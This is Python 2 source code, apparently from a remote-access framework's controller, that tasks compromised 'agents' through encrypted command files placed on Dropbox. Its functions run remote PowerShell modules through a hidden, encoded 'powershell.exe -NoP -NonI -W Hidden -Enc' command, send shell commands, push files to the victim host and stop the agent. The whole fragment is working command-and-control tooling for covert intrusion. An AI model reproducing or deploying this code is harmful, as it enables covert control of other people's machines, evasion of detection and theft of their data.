def taskAgentWithRunPSModule(self, moduleName, moduleArgs=None, interact=False): # Construct the powershell code from a template, substituting palceholders with proper parameters xorKey = Crypto.convertKey(self.statusHandler.masterKey, outputFormat="sha256") parameters = { 'xorKey': xorKey, 'moduleURL': self.statusHandler.publishedModuleList[moduleName] } poshCmd = helpers.convertFromTemplate( parameters, cfg.defaultPath['runPSModuleTpl']) if poshCmd == None: return # Add module arguments if ever if moduleArgs: poshCmd += ";Write-Host \"-> Executing module arguments\";{}".format( moduleArgs) # If we want to interact with the PowerShell CLI once the module is loaded, switch to 'shell' mode if interact: self.taskAgentWithShell(poshCmd) else: task = self.statusHandler.createTask(self.agentID, "runPSModule", args=[moduleName, moduleArgs]) # Turn the powershell code into a suitable powershell base64 encoded one line command base64Payload = helpers.powershellEncode(poshCmd) # Create the final command cmd = "powershell.exe -NoP -sta -NonI -W Hidden -Enc {}".format( base64Payload) # Prepare the task format, then put the task into the command file data = "runCLI\n{}\n{}\n{}".format(task['id'], cmd, helpers.randomString(16)) r = self.dropboxHandler.putFile( self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color( "[+] Agent with ID [{}] has been tasked with task ID [{}]". format(self.agentID, task['id'])) else: print helpers.color( "[!] Error tasking agent with ID [{}]".format( self.agentID))
def taskAgentWithShell(self, cmd): # Prepare the task format, then put the task into the command file data = "shell\n{}\n{}\n{}".format("n/a", cmd, helpers.randomString(16)) r = self.dropboxHandler.putFile( self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: print helpers.color( "[+] Agent with ID [{}] has been tasked with shell command". format(self.agentID)) else: print helpers.color("[!] Error tasking agent with ID [{}]".format( self.agentID))
def taskAgentWithSendFile(self, localFile, destinationPath): # Creating the remote file path (used on the DropBox API server) fileName = os.path.basename(localFile) remoteFilePath = "/" + self.agentID + ".rsc" # First upload the localFile to DropBox try: with open(localFile) as fileHandle: print helpers.color("[*] Uploading file [{}] to [{}]".format( localFile, remoteFilePath)) r = self.dropboxHandler.putFile(remoteFilePath, fileHandle.read()) fileHandle.close() if r is None: return except IOError: print helpers.color( "[!] Could not open or read file [{}]".format(localFile)) return # Once the local file is properly uploaded, proceed with tasking the agent # Create a task task = self.statusHandler.createTask(self.agentID, "sendFile", args=[localFile, destinationPath]) # Prepare the task format, then put the task into the command file data = "downloadFile\n{}\n{}\n{}\n{}\n{}".format( task['id'], remoteFilePath, destinationPath, fileName, helpers.randomString(16)) r = self.dropboxHandler.putFile( self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color( "[+] Agent with ID [{}] has been tasked with task ID [{}]". format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format( self.agentID))
def taskAgentWithStop(self): # Create a task task = self.statusHandler.createTask(self.agentID, "stop") # Prepare the task format, then put the task into the command file data = "stop\n{}\n{}".format(task['id'], helpers.randomString(16)) r = self.dropboxHandler.putFile( self.statusHandler.getAgentAttribute(self.agentID, 'commandFile'), Crypto.encryptData(data, self.statusHandler.masterKey)) if r is not None: # Commit this task for the current agent self.statusHandler.commitTask(task) print helpers.color( "[+] Agent with ID [{}] has been tasked with task ID [{}]". format(self.agentID, task['id'])) else: print helpers.color("[!] Error tasking agent with ID [{}]".format( self.agentID))